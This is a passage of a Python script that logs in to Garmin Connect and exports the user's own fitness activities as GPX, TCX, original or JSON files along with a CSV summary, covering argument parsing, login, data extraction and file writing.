help='show output and log verbosity, save more intermediate files')\n    parser.add_argument('-u', '--username',\n                        help='Garmin Connect username or email address')\n    parser.add_argument('-p', '--password',\n                        help='Garmin Connect password')\n    parser.add_argument('-c', '--count', default='1',\n                        help='number of recent activities to download, or \\'all\\' (default: 1)')\n    parser.add_argument('-e', '--external',\n                        help='path to external program to pass CSV file to')\n    parser.add_argument('-a', '--args',\n                        help='additional arguments to pass to external program')\n    parser.add_argument('-f', '--format', choices=['gpx', 'tcx', 'original', 'json'], default='gpx',\n                        help=\"export format; can be 'gpx', 'tcx', 'original' or 'json' (default: 'gpx')\")\n    parser.add_argument('-d', '--directory', default=activities_directory,\n                        help='the directory to export to (default: \\'./YYYY-MM-DD_garmin_connect_export\\')')\n    parser.add_argument('-s', '--subdir',\n                        help='the subdirectory for activity files (tcx, gpx etc.), supported placeholders are {YYYY} and {MM} (default: export directory)')\n    parser.add_argument('-lp', '--logpath',\n                        help='the directory to store logfiles (default: same as for --directory)')\n    parser.add_argument('--unzip', action='store_true', # no short option: '-u' is already taken by --username\n                        help='if downloading ZIP files (format: \\'original\\'), unzip the file and remove the ZIP file')\n    parser.add_argument('-ot', '--originaltime', action='store_true',\n                        help='will set downloaded (and possibly unzipped) file time to the activity start time')\n    parser.add_argument('--desc', type=int, nargs='?', const=0, default=None,\n                        help='append the activity\\'s description to the file name of the download; limit size if number is given')\n    parser.add_argument('-t', '--template', default=CSV_TEMPLATE,\n                        help='template file with desired columns for CSV output')\n    parser.add_argument('-fp', '--fileprefix', action='count', default=0,\n                        help='set the local time as activity file name prefix')\n    parser.add_argument('-sa', '--start_activity_no', type=int, default=1,\n                        help='give index for first activity to import, i.e. skipping the newest activities')\n    parser.add_argument('-ex', '--exclude', metavar='FILE',\n                        help='JSON file with array of activity IDs to exclude from download. 
Format example: {\"ids\": [\"6176888711\"]}')\n\n return parser.parse_args(argv[1:])\n\ndef login_to_garmin_connect(args):\n \"\"\"\n Perform all HTTP requests to login to Garmin Connect.\n \"\"\"\n username = args.username if args.username else input('Username: ')\n password = args.password if args.password else getpass()\n\n logging.debug('Login params: %s', urlencode(DATA))\n\n # Initially, to get a valid session cookie it is necessary to pull the login page.\n print('Connecting to Garmin Connect...', end='')\n logging.info('Connecting to %s', URL_GC_LOGIN)\n connect_response = http_req_as_string(URL_GC_LOGIN)\n if args.verbosity > 0:\n write_to_file(os.path.join(args.directory, 'connect_response.html'), connect_response, 'w')\n for cookie in COOKIE_JAR:\n logging.debug('Cookie %s: %s', cookie.name, cookie.value)\n print('Done')\n\n # Actual login - fields that are passed in a typical Garmin login.\n post_data = {\n 'username': username,\n 'password': password,\n 'embed': 'false',\n 'rememberme': 'on'\n }\n\n headers = {\n 'referer': URL_GC_LOGIN\n }\n\n print('Requesting Login ticket...', end='')\n logging.info('Requesting Login ticket')\n login_response = http_req_as_string(f'{URL_GC_LOGIN}#', post_data, headers)\n\n for cookie in COOKIE_JAR:\n logging.debug('Cookie %s: %s', cookie.name, cookie.value)\n if args.verbosity > 0:\n write_to_file(os.path.join(args.directory, 'login_response.html'), login_response, 'w')\n\n # extract the ticket from the login response\n pattern = re.compile(r\".*\\?ticket=([-\\w]+)\\\";.*\", re.MULTILINE | re.DOTALL)\n match = pattern.match(login_response)\n if not match:\n raise Exception('Could not find ticket in the login response. Cannot log in.')\n login_ticket = match.group(1)\n print('Done. Ticket=', login_ticket, sep='')\n\n print('Authenticating...', end='')\n logging.info('Authentication URL %s', f'{URL_GC_POST_AUTH}ticket={login_ticket}')\n http_req(f'{URL_GC_POST_AUTH}ticket={login_ticket}')\n print('Done')\n\ndef csv_write_record(csv_filter, extract, activity, details, activity_type_name, event_type_name):\n \"\"\"\n Write out the given data as a CSV record.\n \"\"\"\n type_id = 4 if absent_or_null('activityType', activity) else activity['activityType']['typeId']\n parent_type_id = 4 if absent_or_null('activityType', activity) else activity['activityType']['parentTypeId']\n if present(parent_type_id, PARENT_TYPE_ID):\n parent_type_key = PARENT_TYPE_ID[parent_type_id]\n else:\n parent_type_key = None\n logging.warning('Unknown parentType %s', str(parent_type_id))\n\n # get some values from details if present\n start_latitude = from_activities_or_details('startLatitude', activity, details, 'summaryDTO')\n start_longitude = from_activities_or_details('startLongitude', activity, details, 'summaryDTO')\n end_latitude = from_activities_or_details('endLatitude', activity, details, 'summaryDTO')\n end_longitude = from_activities_or_details('endLongitude', activity, details, 'summaryDTO')\n\n csv_filter.set_column('id', str(activity['activityId']))\n csv_filter.set_column('url', 'https://connect.garmin.com/modern/activity/' + str(activity['activityId']))\n csv_filter.set_column('activityName', activity['activityName'] if present('activityName', activity) else None)\n csv_filter.set_column('description', activity['description'] if present('description', activity) else None)\n csv_filter.set_column('startTimeIso', extract['start_time_with_offset'].isoformat())\n csv_filter.set_column('startTime1123', 
extract['start_time_with_offset'].strftime(ALMOST_RFC_1123))\n csv_filter.set_column('startTimeMillis', str(activity['beginTimestamp']) if present('beginTimestamp', activity) else None)\n csv_filter.set_column('startTimeRaw', details['summaryDTO']['startTimeLocal'] if present('startTimeLocal', details['summaryDTO']) else None)\n csv_filter.set_column('endTimeIso', extract['end_time_with_offset'].isoformat() if extract['end_time_with_offset'] else None)\n csv_filter.set_column('endTime1123', extract['end_time_with_offset'].strftime(ALMOST_RFC_1123) if extract['end_time_with_offset'] else None)\n csv_filter.set_column('endTimeMillis', str(activity['beginTimestamp'] + extract['elapsed_seconds'] * 1000) if present('beginTimestamp', activity) else None)\n csv_filter.set_column('durationRaw', str(round(activity['duration'], 3)) if present('duration', activity) else None)\n csv_filter.set_column('duration', hhmmss_from_seconds(round(activity['duration'])) if present('duration', activity) else None)\n csv_filter.set_column('elapsedDurationRaw', str(round(extract['elapsed_duration'], 3)) if extract['elapsed_duration'] else None)\n csv_filter.set_column('elapsedDuration', hhmmss_from_seconds(round(extract['elapsed_duration'])) if extract['elapsed_duration'] else None)\n csv_filter.set_column('movingDurationRaw', str(round(details['summaryDTO']['movingDuration'], 3)) if present('movingDuration', details['summaryDTO']) else None)\n csv_filter.set_column('movingDuration', hhmmss_from_seconds(round(details['summaryDTO']['movingDuration'])) if present('movingDuration', details['summaryDTO']) else None)\n csv_filter.set_column('distanceRaw', \"{0:.5f}\".format(activity['distance'] / 1000) if present('distance', activity) else None)\n csv_filter.set_column('averageSpeedRaw', kmh_from_mps(details['summaryDTO']['averageSpeed']) if present('averageSpeed', details['summaryDTO']) else None)\n csv_filter.set_column('averageSpeedPaceRaw', trunc6(pace_or_speed_raw(type_id, parent_type_id, activity['averageSpeed'])) if present('averageSpeed', activity) else None)\n csv_filter.set_column('averageSpeedPace', pace_or_speed_formatted(type_id, parent_type_id, activity['averageSpeed']) if present('averageSpeed', activity) else None)\n csv_filter.set_column('averageMovingSpeedRaw', kmh_from_mps(details['summaryDTO']['averageMovingSpeed']) if present('averageMovingSpeed', details['summaryDTO']) else None)\n csv_filter.set_column('averageMovingSpeedPaceRaw', trunc6(pace_or_speed_raw(type_id, parent_type_id, details['summaryDTO']['averageMovingSpeed'])) if present('averageMovingSpeed', details['summaryDTO']) else None)\n csv_filter.set_column('averageMovingSpeedPace', pace_or_speed_formatted(type_id, parent_type_id, details['summaryDTO']['averageMovingSpeed']) if present('averageMovingSpeed', details['summaryDTO']) else None)\n csv_filter.set_column('maxSpeedRaw', kmh_from_mps(details['summaryDTO']['maxSpeed']) if present('maxSpeed', details['summaryDTO']) else None)\n csv_filter.set_column('maxSpeedPaceRaw', trunc6(pace_or_speed_raw(type_id, parent_type_id, details['summaryDTO']['maxSpeed'])) if present('maxSpeed', details['summaryDTO']) else None)\n csv_filter.set_column('maxSpeedPace', pace_or_speed_formatted(type_id, parent_type_id, details['summaryDTO']['maxSpeed']) if present('maxSpeed', details['summaryDTO']) else None)\n csv_filter.set_column('elevationLoss', str(round(details['summaryDTO']['elevationLoss'], 2)) if present('elevationLoss', details['summaryDTO']) else None)\n 
csv_filter.set_column('elevationLossUncorr', str(round(details['summaryDTO']['elevationLoss'], 2)) if not activity['elevationCorrected'] and present('elevationLoss', details['summaryDTO']) else None)\n csv_filter.set_column('elevationLossCorr', str(round(details['summaryDTO']['elevationLoss'], 2)) if activity['elevationCorrected'] and present('elevationLoss', details['summaryDTO']) else None)\n csv_filter.set_column('elevationGain', str(round(details['summaryDTO']['elevationGain'], 2)) if present('elevationGain', details['summaryDTO']) else None)\n csv_filter.set_column('elevationGainUncorr', str(round(details['summaryDTO']['elevationGain'], 2)) if not activity['elevationCorrected'] and present('elevationGain', details['summaryDTO']) else None)\n csv_filter.set_column('elevationGainCorr', str(round(details['summaryDTO']['elevationGain'], 2)) if activity['elevationCorrected'] and present('elevationGain', details['summaryDTO']) else None)\n csv_filter.set_column('minElevation', str(round(details['summaryDTO']['minElevation'], 2)) if present('minElevation', details['summaryDTO']) else None)\n csv_filter.set_column('minElevationUncorr', str(round(details['summaryDTO']['minElevation'], 2)) if not activity['elevationCorrected'] and present('minElevation', details['summaryDTO']) else None)\n csv_filter.set_column('minElevationCorr', str(round(details['summaryDTO']['minElevation'], 2)) if activity['elevationCorrected'] and present('minElevation', details['summaryDTO']) else None)\n csv_filter.set_column('maxElevation', str(round(details['summaryDTO']['maxElevation'], 2)) if present('maxElevation', details['summaryDTO']) else None)\n csv_filter.set_column('maxElevationUncorr', str(round(details['summaryDTO']['maxElevation'], 2)) if not activity['elevationCorrected'] and present('maxElevation', details['summaryDTO']) else None)\n csv_filter.set_column('maxElevationCorr', str(round(details['summaryDTO']['maxElevation'], 2)) if activity['elevationCorrected'] and present('maxElevation', details['summaryDTO']) else None)\n csv_filter.set_column('elevationCorrected', 'true' if activity['elevationCorrected'] else 'false')\n # csv_record += empty_record # no minimum heart rate in JSON\n csv_filter.set_column('maxHRRaw', str(details['summaryDTO']['maxHR']) if present('maxHR', details['summaryDTO']) else None)\n csv_filter.set_column('maxHR', \"{0:.0f}\".format(activity['maxHR']) if present('maxHR', activity) else None)\n csv_filter.set_column('averageHRRaw', str(details['summaryDTO']['averageHR']) if present('averageHR', details['summaryDTO']) else None)\n csv_filter.set_column('averageHR', \"{0:.0f}\".format(activity['averageHR']) if present('averageHR', activity) else None)\n csv_filter.set_column('caloriesRaw', str(details['summaryDTO']['calories']) if present('calories', details['summaryDTO']) else None)\n csv_filter.set_column('calories', \"{0:.0f}\".format(details['summaryDTO']['calories']) if present('calories', details['summaryDTO']) else None)\n csv_filter.set_column('vo2max', str(activity['vO2MaxValue']) if present('vO2MaxValue', activity) else None)\n csv_filter.set_column('aerobicEffect', str(round(details['summaryDTO']['trainingEffect'], 2)) if present('trainingEffect', details['summaryDTO']) else None)\n csv_filter.set_column('anaerobicEffect', str(round(details['summaryDTO']['anaerobicTrainingEffect'], 2)) if present('anaerobicTrainingEffect', details['summaryDTO']) else None)\n csv_filter.set_column('hrZone1Low', str(extract['hrZones'][0]['zoneLowBoundary']) if present('zoneLowBoundary', 
extract['hrZones'][0]) else None)\n csv_filter.set_column('hrZone1Seconds', \"{0:.0f}\".format(extract['hrZones'][0]['secsInZone']) if present('secsInZone', extract['hrZones'][0]) else None)\n csv_filter.set_column('hrZone2Low', str(extract['hrZones'][1]['zoneLowBoundary']) if present('zoneLowBoundary', extract['hrZones'][1]) else None)\n csv_filter.set_column('hrZone2Seconds', \"{0:.0f}\".format(extract['hrZones'][1]['secsInZone']) if present('secsInZone', extract['hrZones'][1]) else None)\n csv_filter.set_column('hrZone3Low', str(extract['hrZones'][2]['zoneLowBoundary']) if present('zoneLowBoundary', extract['hrZones'][2]) else None)\n csv_filter.set_column('hrZone3Seconds', \"{0:.0f}\".format(extract['hrZones'][2]['secsInZone']) if present('secsInZone', extract['hrZones'][2]) else None)\n csv_filter.set_column('hrZone4Low', str(extract['hrZones'][3]['zoneLowBoundary']) if present('zoneLowBoundary', extract['hrZones'][3]) else None)\n csv_filter.set_column('hrZone4Seconds', \"{0:.0f}\".format(extract['hrZones'][3]['secsInZone']) if present('secsInZone', extract['hrZones'][3]) else None)\n csv_filter.set_column('hrZone5Low', str(extract['hrZones'][4]['zoneLowBoundary']) if present('zoneLowBoundary', extract['hrZones'][4]) else None)\n csv_filter.set_column('hrZone5Seconds', \"{0:.0f}\".format(extract['hrZones'][4]['secsInZone']) if present('secsInZone', extract['hrZones'][4]) else None)\n csv_filter.set_column('averageRunCadence', str(round(details['summaryDTO']['averageRunCadence'], 2)) if present('averageRunCadence', details['summaryDTO']) else None)\n csv_filter.set_column('maxRunCadence', str(details['summaryDTO']['maxRunCadence']) if present('maxRunCadence', details['summaryDTO']) else None)\n csv_filter.set_column('strideLength', str(round(details['summaryDTO']['strideLength'], 2)) if present('strideLength', details['summaryDTO']) else None)\n csv_filter.set_column('steps', str(activity['steps']) if present('steps', activity) else None)\n csv_filter.set_column('averageCadence', str(activity['averageBikingCadenceInRevPerMinute']) if present('averageBikingCadenceInRevPerMinute', activity) else None)\n csv_filter.set_column('maxCadence', str(activity['maxBikingCadenceInRevPerMinute']) if present('maxBikingCadenceInRevPerMinute', activity) else None)\n csv_filter.set_column('strokes', str(activity['strokes']) if present('strokes', activity) else None)\n csv_filter.set_column('averageTemperature', str(details['summaryDTO']['averageTemperature']) if present('averageTemperature', details['summaryDTO']) else None)\n csv_filter.set_column('minTemperature', str(details['summaryDTO']['minTemperature']) if present('minTemperature', details['summaryDTO']) else None)\n csv_filter.set_column('maxTemperature', str(details['summaryDTO']['maxTemperature']) if present('maxTemperature', details['summaryDTO']) else None)\n csv_filter.set_column('device', extract['device'] if extract['device'] else None)\n csv_filter.set_column('gear', extract['gear'] if extract['gear'] else None)\n csv_filter.set_column('activityTypeKey', activity['activityType']['typeKey'].title() if present('typeKey', activity['activityType']) else None)\n csv_filter.set_column('activityType', value_if_found_else_key(activity_type_name, 'activity_type_' + activity['activityType']['typeKey']) if present('activityType', activity) else None)\n csv_filter.set_column('activityParent', value_if_found_else_key(activity_type_name, 'activity_type_' + parent_type_key) if parent_type_key else None)\n csv_filter.set_column('eventTypeKey', 
activity['eventType']['typeKey'].title() if present('typeKey', activity['eventType']) else None)\n csv_filter.set_column('eventType', value_if_found_else_key(event_type_name, activity['eventType']['typeKey']) if present('eventType', activity) else None)\n csv_filter.set_column('privacy', details['accessControlRuleDTO']['typeKey'] if present('typeKey', details['accessControlRuleDTO']) else None)\n csv_filter.set_column('fileFormat', details['metadataDTO']['fileFormat']['formatKey'] if present('fileFormat', details['metadataDTO']) and present('formatKey', details['metadataDTO']['fileFormat']) else None)\n csv_filter.set_column('tz', details['timeZoneUnitDTO']['timeZone'] if present('timeZone', details['timeZoneUnitDTO']) else None)\n csv_filter.set_column('tzOffset', extract['start_time_with_offset'].isoformat()[-6:])\n csv_filter.set_column('locationName', details['locationName'] if present('locationName', details) else None)\n csv_filter.set_column('startLatitudeRaw', str(start_latitude) if start_latitude else None)\n csv_filter.set_column('startLatitude', trunc6(start_latitude) if start_latitude else None)\n csv_filter.set_column('startLongitudeRaw', str(start_longitude) if start_longitude else None)\n csv_filter.set_column('startLongitude', trunc6(start_longitude) if start_longitude else None)\n csv_filter.set_column('endLatitudeRaw', str(end_latitude) if end_latitude else None)\n csv_filter.set_column('endLatitude', trunc6(end_latitude) if end_latitude else None)\n csv_filter.set_column('endLongitudeRaw', str(end_longitude) if end_longitude else None)\n csv_filter.set_column('endLongitude', trunc6(end_longitude) if end_longitude else None)\n csv_filter.set_column('sampleCount', str(extract['samples']['metricsCount']) if present('metricsCount', extract['samples']) else None)\n\n csv_filter.write_row()\n\n\ndef extract_device(device_dict, details, start_time_seconds, args, http_caller, file_writer):\n \"\"\"\n Function trying to get the device details (and cache them as they're used for multiple activities)\n\n :param device_dict: cache (dict) of already known devices\n :param details: dict with the details of an activity, should contain a device ID\n :param start_time_seconds: if given use as timestamp for the file written (in seconds since 1970-01-01)\n :param args: command-line arguments (for the file_writer callback)\n :param http_caller: callback to perform the HTTP call for downloading the device details\n :param file_writer: callback that saves the device details in a file\n :return: string with the device name\n \"\"\"\n if not present('metadataDTO', details):\n logging.warning('No metadataDTO')\n return None\n\n metadata = details['metadataDTO']\n device_app_inst_id = metadata['deviceApplicationInstallationId'] if present('deviceApplicationInstallationId', metadata) else None\n if device_app_inst_id:\n if device_app_inst_id not in device_dict:\n # observations...\n # details['metadataDTO']['deviceMetaDataDTO']['deviceId'] == null -> device uknown\n # details['metadataDTO']['deviceMetaDataDTO']['deviceId'] == '0' -> device unknown\n # details['metadataDTO']['deviceMetaDataDTO']['deviceId'] == 'someid' -> device known\n device_dict[device_app_inst_id] = None\n device_meta = metadata['deviceMetaDataDTO'] if present('deviceMetaDataDTO', metadata) else None\n device_id = device_meta['deviceId'] if present('deviceId', device_meta) else None\n if 'deviceId' not in device_meta or device_id and device_id != '0':\n device_json = http_caller(URL_GC_DEVICE + str(device_app_inst_id))\n 
file_writer(os.path.join(args.directory, f'device_{device_app_inst_id}.json'), device_json, 'w', start_time_seconds)\n                if not device_json:\n                    logging.warning('Device details %s are empty', device_app_inst_id)\n                    device_dict[device_app_inst_id] = 'device_id:' + str(device_app_inst_id)\n                else:\n                    device_details = json.loads(device_json)\n                    if present('productDisplayName', device_details):\n                        device_dict[device_app_inst_id] = device_details['productDisplayName'] + ' ' + device_details['versionString']\n                    else:\n                        logging.warning('Device details %s incomplete', device_app_inst_id)\n        return device_dict[device_app_inst_id]\n    return None\n\n\ndef load_zones(activity_id, start_time_seconds, args, http_caller, file_writer):\n    \"\"\"\n    Get the heart rate zones.\n    :param activity_id: ID of the activity (as a string)\n    :param start_time_seconds: if given use as timestamp for the file written (in seconds since 1970-01-01)\n    :param args: command-line arguments (for the file_writer callback)\n    :param http_caller: callback to perform the HTTP call for downloading the heart rate zones\n    :param file_writer: callback that saves the heart rate zones in a file\n    :return: array with the heart rate zones\n    \"\"\"\n    zones = list(HR_ZONES_EMPTY)  # work on a copy so the shared default list is not mutated\n    zones_json = http_caller(f'{URL_GC_ACTIVITY}{activity_id}/hrTimeInZones')\n    file_writer(os.path.join(args.directory, f'activity_{activity_id}_zones.json'), zones_json, 'w', start_time_seconds)\n    zones_raw = json.loads(zones_json)\n    if not zones_raw:\n        logging.warning('HR zones %s are empty', activity_id)\n    else:\n        for raw_zone in zones_raw:\n            if present('zoneNumber', raw_zone):\n                index = raw_zone['zoneNumber'] - 1\n                zones[index] = {}\n                zones[index]['secsInZone'] = raw_zone['secsInZone']\n                zones[index]['zoneLowBoundary'] = raw_zone['zoneLowBoundary']\n    return zones\n\n\ndef load_gear(activity_id, args):\n    \"\"\"\n    Retrieve the gear/equipment for an activity.\n    \"\"\"\n    try:\n        gear_json = http_req_as_string(URL_GC_GEAR + activity_id)\n        gear = json.loads(gear_json)\n        if gear:\n            if args.verbosity > 0:\n                write_to_file(os.path.join(args.directory, f'activity_{activity_id}-gear.json'), gear_json, 'w')\n            gear_display_name = gear[0]['displayName'] if present('displayName', gear[0]) else None\n            gear_model = gear[0]['customMakeModel'] if present('customMakeModel', gear[0]) else None\n            logging.debug('Gear for %s = %s/%s', activity_id, gear_display_name, gear_model)\n            return gear_display_name if gear_display_name else gear_model\n        return None\n    except HTTPError as e:\n        logging.info('Unable to get gear for %s, error: %s', activity_id, e)\n\n\ndef export_data_file(activity_id, activity_details, args, file_time, append_desc, date_time):\n    \"\"\"\n    Write the data of the activity to a file, depending on the chosen data format.\n    The default filename is 'activity_' + activity_id, but this can be modified by the '--fileprefix' option\n    and the 'append_desc' parameter.\n    The directory to write the file into can be modified by the '--subdir' option.\n    :param activity_id: ID of the activity (as string)\n    :param activity_details: details of the activity (for format 'json')\n    :param args: command-line arguments\n    :param file_time: if given the desired timestamp for the activity file (in seconds since 1970-01-01)\n    :param append_desc: suffix to the default filename\n    :param date_time: datetime in ISO format used for '--fileprefix' and '--subdir' options\n    :return: True if the file was written, False if the file existed already\n    \"\"\"\n
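\n    # Worked example (illustrative, not from the original file): with '--fileprefix', a date_time of '2020-07-01 12:34:56' becomes the filename prefix '20200701-123456-' via the replace() chain below.\n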
    # time dependent subdirectory for activity files, e.g. '{YYYY}'\n    if args.subdir is not None:\n        directory = resolve_path(args.directory, args.subdir, date_time)\n    else:\n        directory = args.directory\n\n    if not os.path.isdir(directory):\n        os.makedirs(directory)\n\n    # timestamp as prefix for filename\n    if args.fileprefix > 0:\n        prefix = \"{}-\".format(date_time.replace(\"-\", \"\").replace(\":\", \"\").replace(\" \", \"-\"))\n    else:\n        prefix = \"\"\n\n    original_basename = None\n    if args.format == 'gpx':\n        data_filename = os.path.join(directory, f'{prefix}activity_{activity_id}{append_desc}.gpx')\n        download_url = f'{URL_GC_GPX_ACTIVITY}{activity_id}?full=true'\n        file_mode = 'w'\n    elif args.format == 'tcx':\n        data_filename = os.path.join(directory, f'{prefix}activity_{activity_id}{append_desc}.tcx')\n        download_url = f'{URL_GC_TCX_ACTIVITY}{activity_id}?full=true'\n        file_mode = 'w'\n    elif args.format == 'original':\n        data_filename = os.path.join(directory, f'{prefix}activity_{activity_id}{append_desc}.zip')\n        # but not all original files are in FIT format, some are gpx or TCX\n        original_basename = os.path.join(directory, f'{prefix}activity_{activity_id}{append_desc}')\n        download_url = URL_GC_ORIGINAL_ACTIVITY + activity_id\n        file_mode = 'wb'\n    elif args.format == 'json':\n        data_filename = os.path.join(directory, f'{prefix}activity_{activity_id}{append_desc}.json')\n        file_mode = 'w'\n    else:\n        raise Exception('Unrecognized format.')\n\n    if os.path.isfile(data_filename):\n        logging.debug('Data file for %s already exists', activity_id)\n        print('\\tData file already exists. Skipping...')\n        return False\n\n    if args.format == 'original' and (os.path.isfile(original_basename + '.fit') or os.path.isfile(original_basename + '.gpx') or os.path.isfile(original_basename + '.tcx')):\n        logging.debug('Original data file for %s already exists', activity_id)\n        print('\\tOriginal data file already exists. Skipping...')\n        return False\n\n    if args.format != 'json':\n        try:\n            data = http_req(download_url)\n        except HTTPError as e:\n            if e.code == 500 and args.format == 'tcx':\n                logging.info('Writing empty file since Garmin did not generate a TCX file for this activity...')\n                data = ''\n            else:\n                logging.info('Got %s for %s', e.code, download_url)\n                raise Exception(f'Failed. Got an HTTP error {e.code} for {download_url}')\n
    else:\n        data = activity_details\n\n    # persist file\n    write_to_file(data_filename, data, file_mode, file_time)\n\n    # Success: Add activity ID to downloaded_ids.json\n    update_download_stats(activity_id, args.directory)\n\n    if args.format == 'original':\n        # even a manually uploaded GPX file comes back zipped from Garmin, so unzip the download if requested\n        if args.unzip and data_filename[-3:].lower() == 'zip':\n            logging.debug('Unzipping and removing original file, size is %s', os.stat(data_filename).st_size)\n            if os.stat(data_filename).st_size > 0:\n                zip_file = open(data_filename, 'rb')\n                zip_obj = zipfile.ZipFile(zip_file)\n                for name in zip_obj.namelist():\n                    unzipped_name = zip_obj.extract(name, directory)\n                    name_base, name_ext = os.path.splitext(name)\n                    # handle some cases from 2020 activities, where Garmin added '_ACTIVITY' to the name in the ZIP; remove it\n                    name_base = name_base.replace('_ACTIVITY', '')\n                    new_name = os.path.join(directory, f'{prefix}activity_{name_base}{append_desc}{name_ext}')\n                    logging.debug('renaming %s to %s', unzipped_name, new_name)\n                    os.rename(unzipped_name, new_name)\n                    if file_time:\n                        os.utime(new_name, (file_time, file_time))\n                zip_file.close()\n            else:\n                print('\\tSkipping 0Kb zip file.')\n            os.remove(data_filename)\n\n    return True\n\n\ndef setup_logging(args):\n    \"\"\"\n    Set up logging.\n    \"\"\"\n    logpath = args.logpath if args.logpath else args.directory\n    if not os.path.isdir(logpath):\n        os.makedirs(logpath)\n\n    logging.basicConfig(\n        filename = os.path.join(logpath, 'gcexport.log'),\n        level = logging.DEBUG,\n        format = '%(asctime)s [%(levelname)-7.7s] %(message)s'\n    )\n\n    # set up logging to console\n    console = logging.StreamHandler()\n    console.setLevel(logging.WARN)\n    formatter = logging.Formatter('[%(levelname)s] %(message)s')\n    console.setFormatter(formatter)\n    logging.getLogger('').addHandler(console)\n\n\ndef logging_verbosity(verbosity):\n    \"\"\"\n    Adapt logging verbosity, separately for logfile and console output.\n    \"\"\"\n    logger = logging.getLogger()\n    for handler in logger.handlers:\n        if isinstance(handler, logging.FileHandler):\n            level = logging.DEBUG if verbosity > 0 else logging.INFO\n            handler.setLevel(level)\n            logging.info('New logfile level: %s', logging.getLevelName(level))\n        elif isinstance(handler, logging.StreamHandler):\n            level = logging.DEBUG if verbosity > 1 else (logging.INFO if verbosity > 0 else logging.WARN)\n            handler.setLevel(level)\n            logging.debug('New console log level: %s', logging.getLevelName(level))\n
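\n# Resulting levels from the handlers above: no flag -> logfile INFO / console WARN; '-v' -> logfile DEBUG / console INFO; '-vv' (or more) -> logfile DEBUG / console DEBUG.\n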
\n\ndef fetch_userstats(args):\n    \"\"\"\n    HTTP request for getting user statistics such as the total number of activities. The JSON will be saved as a file 'userstats.json'.\n    :param args: command-line arguments (for args.directory, etc)\n    :return: JSON with user statistics\n    \"\"\"\n    print('Getting display name...', end='')\n    logging.info('Profile page %s', URL_GC_PROFILE)\n    profile_page = http_req_as_string(URL_GC_PROFILE)\n    if args.verbosity > 0:\n        write_to_file(os.path.join(args.directory, 'profile.html'), profile_page, 'w')\n\n    display_name = extract_display_name(profile_page)\n    print('Done. displayName = ', display_name, sep='')\n\n    print('Fetching user stats...', end='')\n    logging.info('Userstats page %s', URL_GC_USERSTATS + display_name)\n    result = http_req_as_string(URL_GC_USERSTATS + display_name)\n    print('Done')\n\n    write_to_file(os.path.join(args.directory, 'userstats.json'), result, 'w')\n\n    return json.loads(result)\n\n\ndef extract_display_name(profile_page):\n    \"\"\"\n    Extract the display name from the profile page HTML document.\n\n    :param profile_page: HTML document\n    :return: the display name\n    \"\"\"\n    # display name should be in the HTML document as \"displayName\": \"John/Doe\"\n    pattern = re.compile(r\".*\\\"displayName\\\":\\\"(.+?)\\\".*\", re.MULTILINE | re.DOTALL)\n    match = pattern.match(profile_page)\n    if not match:\n        raise Exception('Did not find the display name in the profile page.')\n    display_name = match.group(1)\n    return display_name\n\n\ndef fetch_activity_list(args, total_to_download):\n    \"\"\"\n    Fetch the first 'total_to_download' activity summaries; as a side effect save them in JSON format.\n    :param args: command-line arguments (for args.directory, etc.)\n    :param total_to_download: number of activities to download\n    :return: list of activity summaries\n    \"\"\"\n    activities = []\n\n    total_downloaded = 0\n    while total_downloaded < total_to_download:\n        if total_to_download - total_downloaded > LIMIT_MAXIMUM:\n            num_to_download = LIMIT_MAXIMUM\n        else:\n            num_to_download = total_to_download - total_downloaded\n\n        chunk = fetch_activity_chunk(args, num_to_download, total_downloaded)\n        activities.extend(chunk)\n        total_downloaded += num_to_download\n\n    # it seems that parent multisport activities are not counted in userstats\n    if len(activities) != total_to_download:\n        logging.info('Expected %s activities, got %s', total_to_download, len(activities))\n    return activities\n\n\ndef annotate_activity_list(activities, start, exclude_list):\n    \"\"\"\n    Annotate each activity with the action to take: 's' (skip, before the start index), 'e' (excluded by ID) or 'd' (download).\n    \"\"\"\n    action_list = []\n    for index, a in enumerate(activities):\n        if index < (start - 1):\n            action = 's'\n        elif str(a['activityId']) in exclude_list:\n            action = 'e'\n        else:\n            action = 'd'\n\n        action_list.append(dict(index=index, action=action, activity=a))\n\n    return action_list\n
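\n\n# Note: the Garmin activity list endpoint is paged; fetch_activity_chunk() below requests at most LIMIT_MAXIMUM summaries per call via its 'start'/'limit' query parameters.\n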
\ndef fetch_activity_chunk(args, num_to_download, total_downloaded):\n    \"\"\"\n    Fetch a chunk of activity summaries. As a side effect save them in the JSON format.\n    :param args: command-line arguments (for args.directory, etc.)\n    :param num_to_download: number of summaries to download in this chunk\n    :param total_downloaded: number of already downloaded summaries in previous chunks\n    :return: list of activity summaries\n    \"\"\"\n\n    search_parameters = {\n        'start': total_downloaded,\n        'limit': num_to_download\n    }\n    print('Querying list of activities ', total_downloaded+1, '..', total_downloaded+num_to_download, '...', sep='', end='')\n    logging.info('Activity list URL %s', URL_GC_LIST + urlencode(search_parameters))\n    result = http_req_as_string(URL_GC_LIST + urlencode(search_parameters))\n    print('Done.')\n\n    # persist JSON activities list\n    current_index = total_downloaded + 1\n    activities_list_filename = f'activities-{current_index}-{total_downloaded+num_to_download}.json'\n    write_to_file(os.path.join(args.directory, activities_list_filename), result, 'w')\n    activity_summaries = json.loads(result)\n    fetch_multisports(activity_summaries, http_req_as_string, args)\n    return activity_summaries\n\n\ndef fetch_multisports(activity_summaries, http_caller, args):\n    \"\"\"\n    Search 'activity_summaries' for multisport activities and then fetch the information for the activity parts\n    and insert them into the 'activity_summaries' just after the multisport activity.\n    :param activity_summaries: list of activity_summaries, will be modified in-place\n    :param http_caller: callback to perform the HTTP call for downloading the activity details\n    :param args: command-line arguments (for args.directory, etc.)\n    \"\"\"\n    for idx, child_summary in enumerate(activity_summaries):\n        type_key = None if absent_or_null('activityType', child_summary) else child_summary['activityType']['typeKey']\n        if type_key == 'multi_sport':\n            details_string, details = fetch_details(child_summary['activityId'], http_caller)\n\n            child_ids = details['metadataDTO']['childIds'] if 'metadataDTO' in details and 'childIds' in details['metadataDTO'] else None\n            # insert the children in reversed order, always at the same index, so they end up in their original order\n            for child_id in reversed(child_ids):\n                child_string, child_details = fetch_details(child_id, http_caller)\n                if args.verbosity > 0:\n                    write_to_file(os.path.join(args.directory, f'child_{child_id}.json'), child_string, 'w')\n                child_summary = dict()\n                copy_details_to_summary(child_summary, child_details)\n                activity_summaries.insert(idx + 1, child_summary)\n\ndef fetch_details(activity_id, http_caller):\n    \"\"\"\n    Try to get the activity details for an activity.\n    :param activity_id: id of the activity to fetch\n    :param http_caller: callback to perform the HTTP call for downloading the activity details\n    :return details_as_string, details_as_json_dict:\n    \"\"\"\n    activity_details = None\n    details = None\n    tries = MAX_TRIES\n    while tries > 0:\n        activity_details = 